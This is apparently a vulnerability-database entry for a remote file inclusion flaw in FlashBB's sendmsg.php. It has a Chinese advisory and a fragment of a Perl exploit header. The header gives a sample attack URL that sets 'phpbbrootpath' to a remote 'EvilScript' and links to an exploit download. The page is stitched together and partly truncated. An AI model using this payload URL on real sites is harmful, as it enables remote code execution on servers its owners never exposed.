EUVD-2006-7014

Malware in sbrugna...

FlashBB Sendmsg.PHP远程文件包含漏洞

FlashBB是一款基于PHP的论坛程序。 FlashBB不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是'Sendmsg.PHP'脚本对用户提交的'phpbbrootpath'参数缺少过滤，指定远程服务器上的PHP文件作为包含对象，可导致以WEB进程权限执行任意命令。 TUFaT FlashBB 1.1.7 目前没有解决方案提供 http://www.sebug.net/show-exp-2121.html...

FlashBB <= 1.1.8 (sendmsg.php) Remote File Inclusion Vulnerability

No description provided by source. !/usr/bin/perl Flashbb = 1.1.7 - Remote File Inclusion Exploit Url: http://rapidshare.com/files/41426468/FlashBBAaeDueHFcu.zip Exploit: http://site.com/path/phpbb/sendmsg.php?phpbbrootpath=EvilScript: coded and f0und3d by kw3rln officeatrosecuritygroupdotnet...